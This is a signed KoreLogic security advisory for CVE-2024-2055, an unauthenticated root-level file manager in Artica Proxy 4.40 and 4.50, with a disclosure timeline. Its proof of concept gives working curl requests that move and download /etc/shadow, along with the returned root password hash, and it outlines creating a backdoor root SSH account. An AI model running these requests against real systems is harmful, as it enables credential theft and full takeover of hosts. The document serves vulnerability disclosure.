-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

KL-001-2024-003: Artica Proxy Unauthenticated File Manager Vulnerability

Title: Artica Proxy Unauthenticated File Manager Vulnerability
Advisory ID: KL-001-2024-003
Publication Date: 2024.03.05
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-003.txt


1. Vulnerability Details

     Affected Vendor: Artica
     Affected Product: Artica Proxy
     Affected Version: 4.40 and 4.50
     Platform: Debian 10 LTS
     CWE Classification: CWE-288: Authentication Bypass Using an
                         Alternate Path or Channel, CWE-552: Files
                         or Directories Accessible to External
                         Parties
     CVE ID: CVE-2024-2055


2. Vulnerability Description

     The "Rich Filemanager" feature of Artica Proxy provides a
     web-based interface for file management capabilities. When
     the feature is enabled, it does not require authentication by
     default, and runs as the root user.


3. Technical Description

     The Artica Proxy can be installed with a small amount of
     "Features" enabled. Within the administrative web interface,
     additional features can be installed, enabled, and disabled. The
     "Rich Filemanager" feature is disabled by default. Enabling
     this feature will spawn a listener on port 5000/tcp bound to
     0.0.0.0. By default, when this feature is enabled, authentication
     is not required to access the web interface. The "Rich
     Filemanager" runs as the root user. This provides an
     unauthenticated attacker complete access to the file system.

       root@artica:~# ps -efww | grep -i File
       root      1888  1885  0 09:13 ?        00:00:00 php-fpm: pool RICHFILEMANAGER
       root      1889  1885  0 09:13 ?        00:00:00 php-fpm: pool RICHFILEMANAGER

     This can be exploited by an attacker to add entries in to
     /etc/shadow, /etc/passwd, and /etc/ssh/sshd_config to create
     an additional root-level account that has the ability to SSH
     in to the system.


4. Mitigation and Remediation Recommendation

     No response from vendor. Rich Filemanager feature is disabled
     by default. Leave it that way.


5. Credit

     This vulnerability was discovered by Jim Becher of KoreLogic,
     Inc.


6. Disclosure Timeline

     2023.12.18 - KoreLogic requests vulnerability contact and
                  secure communication method from Artica.
     2023.12.18 - Artica Support issues automated ticket #1703011342
                  promising follow-up from a human.
     2024.01.10 - KoreLogic again requests vulnerability contact and
                  secure communication method from Artica.
     2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from
                  mail.articatech.com with response
                  "Client host rejected: Go Away!"
     2024.01.11 - KoreLogic requests vulnerability contact and
                  secure communication method via
                  https://www.articatech.com/ 'Contact Us' web form.
     2024.01.23 - KoreLogic requests CVE from MITRE.
     2024.01.23 - MITRE issues automated ticket #1591692 promising
                  follow-up from a human.
     2024.02.01 - 30 business days have elapsed since KoreLogic
                  attempted to contact the vendor.
     2024.02.06 - KoreLogic requests update on CVE from MITRE.
     2024.02.15 - KoreLogic requests update on CVE from MITRE.
     2024.02.22 - KoreLogic reaches out to alternate CNA for
                  CVE identifiers.
     2024.02.26 - 45 business days have elapsed since KoreLogic
                  attempted to contact the vendor.
     2024.02.29 - Vulnerability details presented to AHA!
                  (takeonme.org) by proxy.
     2024.03.01 - AHA! issues CVE-2024-2055 to track this
                  vulnerability.
     2024.03.05 - KoreLogic public disclosure.


7. Proof of Concept

     Step 1: Move /etc/shadow to /tmp/shadow
     $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' $'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885542096&mode=move&old=%2Fetc%2Fshadow&new=%2Ftmp%2F&_=1700868631198'

     {"data":{"id":"\/tmp\/shadow","type":"file","attributes":{"name":"shadow","path":"\/tmp\/shadow","readable":1,"writable":1,"created":"","modified":"24 Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":"2037"}}}

     Step 2: Download /tmp/shadow
     $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Pragma: no-cache' -H $'Cache-Control: no-cache' $'http://192.168.2.139:5000/connectors/php/filemanager.php?mode=download&path=%2Ftmp%2Fshadow&time=1700885590870'

     root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7:::
     daemon:*:19507:0:99999:7:::
     bin:*:19507:0:99999:7:::
     sys:*:19507:0:99999:7:::
     sync:*:19507:0:99999:7:::
     games:*:19507:0:99999:7:::
     man:*:19507:0:99999:7:::
     lp:*:19507:0:99999:7:::
     mail:*:19507:0:99999:7:::
     news:*:19507:0:99999:7:::
     uucp:*:19507:0:99999:7:::
     proxy:*:19507:0:99999:7:::
     www-data:*:19507:0:99999:7:::
     backup:*:19507:0:99999:7:::
     list:*:19507:0:99999:7:::
     irc:*:19507:0:99999:7:::
     gnats:*:19507:0:99999:7:::
     nobody:*:19507:0:99999:7:::
     _apt:*:19507:0:99999:7:::
     systemd-timesync:*:19507:0:99999:7:::
     systemd-network:*:19507:0:99999:7:::
     systemd-resolve:*:19507:0:99999:7:::
     messagebus:*:19507:0:99999:7:::
     quagga:*:19507:0:99999:7:::
     apt-mirror:*:19507:0:99999:7:::
     privoxy:*:19507:0:99999:7:::
     ntp:*:19507:0:99999:7:::
     redsocks:!:19507:0:99999:7:::
     prads:*:19507:0:99999:7:::
     freerad:*:19507:0:99999:7:::
     vnstat:*:19507:0:99999:7:::
     stunnel4:!:19507:0:99999:7:::
     sshd:*:19507:0:99999:7:::
     vde2-net:*:19507:0:99999:7:::
     memcache:!:19507:0:99999:7:::
     davfs2:*:19507:0:99999:7:::
     ziproxy:!:19507:0:99999:7:::
     proftpd:!:19507:0:99999:7:::
     ftp:*:19507:0:99999:7:::
     mosquitto:*:19507:0:99999:7:::
     openldap:!:19507:0:99999:7:::
     munin:*:19507:0:99999:7:::
     msmtp:*:19507:0:99999:7:::
     Debian-snmp:!:19507:0:99999:7:::
     opendkim:*:19507:0:99999:7:::
     avahi:*:19507:0:99999:7:::
     glances:*:19507:0:99999:7:::
     ArticaStats:!:19507:0:99999:7:::
     netdata:!:19507:0:99999:7:::
     mysql:!:19507:0:99999:7:::
     postfix:!:19507:0:99999:7:::
     squid:!:19507:0:99999:7:::
     smokeping:!:19507:0:99999:7:::
     unbound:!:19645:0:99999:7:::

     Step 3: Move /tmp/shadow back to /etc/shadow as not to create a DoS condition
     $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' $'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885798719&mode=move&old=%2Ftmp%2Fshadow&new=%2Fetc%2F&_=1700868631208'

     {"data":{"id":"\/etc\/shadow","type":"file","attributes":{"name":"shadow","path":"\/etc\/shadow","readable":0,"writable":1,"created":"","modified":"24 Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":0}}}


The contents of this advisory are copyright(c) 2024
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCAA4FiEEB12WYZwbVwYTJ/b2DKLsCTlWkekFAmXnYIsaHGRpc2Nsb3N1
cmVzQGtvcmVsb2dpYy5jb20ACgkQDKLsCTlWkena/g//cOZyVrVzviWbsUmWrvFl
O0pcF/yFYRo0OpBXa2/Kk6VOk83XaHarmV9dsIBCsm/opMYmI9poS/yhn3SsDtT1
b49S5Jue5pGsFKljOjrrtHeRQjUWz1ufnfWV6/CZJ1T3oYidXoqvQ9vepE/wfkDK
pjWlfG5B3ZMw2IP1ohrFH4DrLmMBVZkC4q3fkouRTgbAenhAQEaBbTljXw5caMC4
mbG/2tA6C/TBtdXxndMEbXo6Ke4u2UxHoJ9fPiKTSXG3z7sEKYBwtFT2fWuzDpJB
WB5l6G7/Pv/xywr4uZGBFD28P7ZOY4aW3XNNCm2YBR/3QTr7TuJQ7TFiszKbf1uS
QrSVFEWLbW1Z7KvpAptFDoBoUTSNxuPf4BZ2y4dmkwA2o+JuiuoJznqQX+j53Rb/
2zCOfu6uaYfw4L+1BcnXIMGiV/SRiFGWOGrhlwHlSV60CxzztwU3qAwrPUmST5la
KjBd8G8LYgCHraCEKwm2EL9Xcl6yf3kZzLnsawfcNZ/cITnICJFfCHYbIBm7iSOt
P302ALPLyYivKBvE/f5ki0wa/wMawWjo4qF2Y9didtMbSJZMTcA5l0SjsSzbEpke
hBkpo6tLfl3CHQhpcysKBSPskymyzZXI/OBKTDFt3dFx115SQdOvxWD8XRyY0YLp
2u0C49dXhQuGzsSMXrjg0ow=
=q7lN
-----END PGP SIGNATURE-----